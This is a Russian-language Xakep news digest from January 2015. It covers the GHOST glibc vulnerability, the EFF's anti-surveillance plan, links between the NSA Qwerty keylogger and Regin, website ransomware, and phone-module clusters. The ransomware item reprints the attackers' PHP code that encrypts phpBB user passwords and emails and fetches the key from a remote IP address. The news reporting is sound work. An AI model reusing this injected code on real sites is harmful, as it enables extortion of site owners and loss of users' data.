Отправляет email-рассылки с помощью сервиса Sendsay

Хakep_daily

  Все выпуски  

Модули от смартфонов -- <<мозг>> вычислительных кластеров *


PDA   подписка    wiki   bugtrack   статьи    видео   блог   форум   поиск    друзья   






Уязвимость GHOST в Linux обнаружили спустя 14 лет
2015-01-28 14:30 Denis Mirkov

Мир свободного софта поразила ещё одна критическая уязвимость, которой присвоено собственное имя: GHOST («призрак»). Дыра существует в Linux-системах, использующих библиотеку Glibc (GNU C Library), начиная с версии glibc-2.2 от 2000 года.

С помощью GHOST злоумышленник способен с удивительной лёгкостью (например, отправив письмо по электронной почте) получить полный контроль над компьютером жертвы, не владея заранее никакой информацией об учётных данных. Потенциально уязвимыми к GHOST называют почтовые серверы, MySQL-серверы, Secure Shell серверы, приложения обработки веб-форм и др.

Удалённое выполнение произвольного кода в системе происходит после переполнения буфера в функции __nss_hostname_digits_dots(), которую, в свою очередь, используют функции gethostbyname() и gethostbyname2() библиотеки Glibc.

Версия glibc-2.2 выпущена 10 ноября 2000 года. Баг исправлен патчем между релизами glibc-2.17 и glibc-2.18. К сожалению, его не классифицировали как патч безопасности, так что почти все популярные дистрибутивы с долговременной поддержкой остались на старой «стабильной» версии glibc. Среди них Debian 7 (Wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04 и другие.

Подробно об уязвимости, которой присвоен технический идентификатор CVE-2015-0235, рассказали исследователи из компании Qualys.

В течение последнего времени Qualys тесно сотрудничала с вендорами, чтобы выпустить патчи для всех поражённых дистрибутивов Linux. С сегодняшнего дня патчи доступны для установки.

Проверка машины на наличие уязвимости GHOST осуществляется с помощью этой утилиты, которую выпустили исследователи из Qualys.

Прочитать полностью на сайте: Уязвимость GHOST в Linux обнаружили спустя 14 лет



Стратегия EFF по устранению глобальной слежки
2015-01-28 16:30 Denis Mirkov

Фонд электронных рубежей (EFF) опубликовал продуманный стратегический план по противодействию глобальной прослушки коммуникаций со стороны АНБ и других государственных спецслужб.

EFF подчёркивает, что речь идёт не только об американских гражданах, которых частично защищают конституция и действующее законодательство, но и о «96% остального населения Земли, живущих за пределами США». Ведь на них не распространяется защита. И проблема касается не только АНБ и GHCQ, но и десятков других правительственных спецслужб в разных странах, которые занимаются в точности тем же АНБ. Американское агентство приводится как пример самого сильного игрока, но контрмеры должны действовать против всех злоумышленников государственного масштаба.

«Годами мы работали над стратегией противодействия массовой прослушке цифровых коммуникаций невинных людей по всему миру. Сегодня мы излагаем этот план, так что вы можете представить, как все кусочки складываются друг с другом. Решайте сами, где вы можете помочь с максимальным эффектом», — пишет EFF.

Итак, стратегия EFF сводится к следующим пунктам.

1. Давление на технологические компании для укрепления их систем против слежки АНБ

На данный момент компании ведут себя по-разному, сотрудничая с АНБ или пытаясь противодействовать такому партнёрству. Но у каждой ИТ-компании есть возможность реализовать технические стандарты, которые затруднят массовую слежку — в этом отношении ИТ-компании занимают уникальное положение.

Кроме того, ИТ-компании тратят миллионы долларов на лоббирование своих интересов в Конгрессе. Нужно сделать так, чтобы часть этих денег была потрачена на всеобщее благо.

Соответствующие программы EFF — Reset the Net и HTTPS Everywhere.

2. Создание глобального движения, которое пропагандирует шифрование на стороне конечного пользователя

Чтобы склонить крупную корпорацию к реализации стойкой криптографии, могут потребоваться годы, но каждый пользователь способен сделать это на своём компьютере за несколько минут, шифруя чат, электронную почту и веб-трафик.

В помощь пользователям создан ресурс Surveillance Self Defense. Его материалы переводятся на разные языки.

3. Помощь в разработке более простых в использовании инструментов для защищённых коммуникаций

Не секрет, что многие существующие инструменты для шифрования сложны для простых людей. В то же время, есть удобные программы, в которых не реализованы должные меры по обеспечению безопасности. Ситуацию следует исправить. EFF ведёт мониторинг по нескольким критериям на странице Secure Messaging Scorecard.

4. Реформа исполнительного приказа № 12333

Согласно исполнительному приказу президента США № 12333 от 4 декабря 1981 г. АНБ организует и осуществляет сбор информации с помощью радиоэлектронной разведки, а также разработку кодов и шифров. Агентство обслуживает около 2000 станций радиоэлектронного перехвата для слежки за иностранными гражданами по всему миру.

Сейчас началась реализация первого этапа плана EFF по реформе приказа № 12333.

5. Разработка базовых правовых принципов слежки и защиты конфиденциальной информации, которые помогут студентам и юристам по всему миру

Кампания началась задолго до того, как были опубликованы документы Сноудена. Базовый документ Application of Human Rights to Communications Surveillance содержит 13 строгих принципов, которые должны соблюдаться неукоснительно.

6. Взращивание партнёров по всему миру, способных бороться за реформы на местном уровне, поддержка и содействие

В EFF есть штатный человек на должности International Rights Director, который практически всё своё время проводит в поездках по разным странам, встречаясь с активистами и юристами, которые борются за изменение законодательства по слежке за населением.

К сожалению, в некоторых странах, где царит атмосфера страха, проводить такие реформы затруднительно. Были случаи, когда активистов, борющихся против тотальной слежки, обвиняют в защите интересов педофилов или террористов — власти не гнушаются самыми грязными трюками. Но это не значит, что нужно прекратить борьбу.

В поддержку правозащитников запущены проекты «Истории успеха в борьбе со слежкой» и «Я борюсь с наблюдением», где активисты из разных стран делятся опытом и поддерживают друг друга.

7. Остановить превышение полномочий со стороны АНБ с помощью судебных процессов и нового законодательства

АНБ часто приводит аргумент, что закон США под названием FISA Amendments Act допускает тотальную прослушку всех пользователей интернета. Это не так.

8. Реализовать прозрачное применение законов о слежке

Один из приёмов спецслужб — не только осуществлять секретную слежку, но засекретить сам факт получения таких полномочий. Общество зачастую даже не знает, какие технологии применяют спецслужбы. С этим можно бороться, если агрессивно использовать Закон о свободе информации.


Наблюдение за гражданами — это глобальная проблема, которая имеет место во всех уголках мира, куда дотягивается интернет. Принять участие в реализации стратегического плана EFF может каждый гражданин. Почти во всех странах действуют общественные группы по защите прав граждан в интернете. Кроме того, всем доступны инструменты для шифрования личных коммуникаций.

В конце концов, гражданин любой страны поддержит план, вступив в ряды EFF.

003

Прочитать полностью на сайте: Стратегия EFF по устранению глобальной слежки



Сходство исходников кейлоггера АНБ и трояна Regin
2015-01-28 21:33 Denis Mirkov

Две недели назад немецкий журнал Spiegel опубликовал новые документы Сноудена с описанием вредоносного программного обеспечения, которое используется АНБ в время проведения «фазы 0», то есть подготовительного этапа операции. Цель — нащупать слабые звенья и уязвимости в системах противника. На последующих этапах происходит установка троянов и бэкдоров в системах противника и получение контроля над ними.

Среди прочего, в одном из документов приведён исходный код кейлоггера Qwerty, одного из модулей универсального шпионского фреймворка Warriorpride.

История получила неожиданное продолжение. Вчера специалисты «Лаборатории Касперского» выложили результаты сравнительного тестирования, которые показывают поразительное сходство отдельных фрагментов кейлоггера Qwerty с трояном Regin.

Regin — исключительно сложная и профессиональная программа, найденная на серверах бельгийской телекоммуникационной компании Belgacom и у других провайдеров в разных странах мира. Эксперты Symantec в ноябре 2014 года называли её «самым сложным» из всех образцов malware, какие попадались в минувшие годы. Эксперты практически не сомневались, что разработка Regin имела поддержку государственного уровня. Теперь мы можем догадаться, какая именно страна занималась «грязными» делишками.

Модуль Qwerty состоит из трёх бинарников и конфигурационных файлов. «Лаборатория Касперского» выделила бинарник 20123.sys и представила доказательства, что он сделан на основе исходного кода плагина 50251, входящего в состав Regin.

003

Основная часть общего кода принадлежит функции, которая получает доступ к системному драйверу клавиатуры.

004

Более того, в Qwerty есть одна строка, где модуль напрямую обращается к плагину 50225 из комплекта Regin. Это явное указание на то, что плагин Qwerty может работать как часть платформы Regin.

005

Прочитать полностью на сайте: Сходство исходников кейлоггера АНБ и трояна Regin



Хочешь сайт обратно? Плати
2015-01-28 23:40 Denis Mirkov

Всё больше персональных компьютеров становятся жертвами троянов-вымогателей, которые шифруют документы и требуют выкуп в биткоинах за их расшифровку. Теперь на ту же наживку начали ловить владельцев веб-сайтов. О новых приёмах преступников сообщила компания High-Tech Bridge.

Специалисты впервые столкнулись с новым видом атаки в декабре 2014 года, когда за помощью обратилась одна из финансовых компаний: их веб-сайт вышел из строя и выдавал ошибку БД.

Тщательное расследование выявило поразительную вещь. Оказывается, троян установили на сервере ещё шесть месяцев (!) назад. Несколько серверных скриптов модифицировали таким образом, чтобы шифровать информацию перед занесением в БД и расшифровывать её «на лету» при получении запроса к базе. Ключ шифрования хранился на удалённом сервере.

Работа зловреда долго оставалась незамеченной для пользователей веб-приложения, пока в день «Д» злоумышленники не пошли в атаку и не удалили ключ шифрования.

Сотрудники High-Tech Bridge посчитали это уникальным случаем таргетированной атаки, но не тут-то было. Вскоре с аналогичным вымогательством столкнулся ещё один клиент, у которого враги зашифровали… базу с учётными данными пользователей форума phpBB.

Здесь использовался такой же сценарий. Функцию “sql_fetchrow()” в файле factory.php модифицировали, чтобы она выдавала расшифрованные значения полей с именами пользователей и адресами электронной почты.

if(isset($result['user_password'])){ 
 $result['user_password'] = $cipher->decrypt($result['user_password']); 
} 
if(isset($result['user_email'])){ 
 $result['user_email'] = $cipher->decrypt($result['user_email']); 
}

Шифрование этих полей добавили в другие скрипты.

$sql_ary = array( 
 'username'=>$user_row['username'], 
 'username_clean' => $username_clean, 
 'user_password' => (isset($user_row['user_password']))? 
    $cipher->encrypt($user_row['user_password']):$cipher->encrypt(''), 
 'user_email'=> $cipher->encrypt(strtolower($user_row['user_email'])), 
 'user_email_hash'=> phpbb_email_hash($user_row['user_email']), 
 'group_id' => $user_row['group_id'], 
 'user_type' => $user_row['user_type'], 
);

Адрес ключа шифрования прописан в конфигурационном файле.

class Cipher { 
 private $securekey, $iv; 
 function __construct($textkey) { 
  $this->securekey = hash('sha256',$textkey,TRUE); 
  $this->iv = mcrypt_create_iv(32); 
 } 
 function encrypt($input) { 
  return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256, 
       $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv)); 
 } 
 function decrypt($input) { 
  return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256, 
       $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv)); 
 } 
} 
$key=file_get_contents('https://103.13.120.108/sfdoif89d7sf8d979dfgf/ 
sdfds90f8d9s0f8d0f89.txt'); 
$cipher=new Cipher($key); 

Злоумышленник терпел два месяца, прежде чем удалить ключ с удалённого сервера и потребовать выкуп $1000.

На сегодняшний день ни один антивирус не определяет инсталляторы этого зловреда: файл1, файл2.

Прочитать полностью на сайте: Хочешь сайт обратно? Плати



Модули от смартфонов — «мозг» вычислительных кластеров
2015-01-29 10:40 Denis Mirkov

Модульные смартфоны вроде Project Ara толком не вышли на рынок, а изобретательные хакеры уже нашли, как использовать устаревшие детали. Оказывается, они отлично подходят для сборки серверных кластеров.

Идею кластеров PuzzleCluster предложили инженеры из компании Circular Devices, которые два месяца назад представили прототип собственного модульного смартфона PuzzlePhone. Их аппарат разделяется на три модуля. В первом модуле (Brain CPU, «Мозг») установлена основная электроника и камера. Во втором модуле («Сердце») — вторичная электроника и аккумулятор. В третьем («Хребет») — ЖК-дисплей, динамики и часть корпуса.

Собрать «суперкомпьютерный» кластер из телефонных модулей Brain CPU можно в домашних условиях, пишут авторы. По их мнению, это первая в мире масштабируемая вычислительная платформа, основанная на повторном использовании модулей от мобильных устройств.

Корпус PuzzleCluster предусматривает место для модулей типа «Мозг», а также для модулей с аккумуляторами, из которых составляется источник бесперебойного питания. Таким образом, ненужные батареи от смартфонов тоже пригодны для повторного использования.

003

«Мы не мечтаем о будущем, мы делаем его сейчас», — заявляют финские фантазёры.

Прочитать полностью на сайте: Модули от смартфонов — «мозг» вычислительных кластеров




© Copyright Gameland

В избранное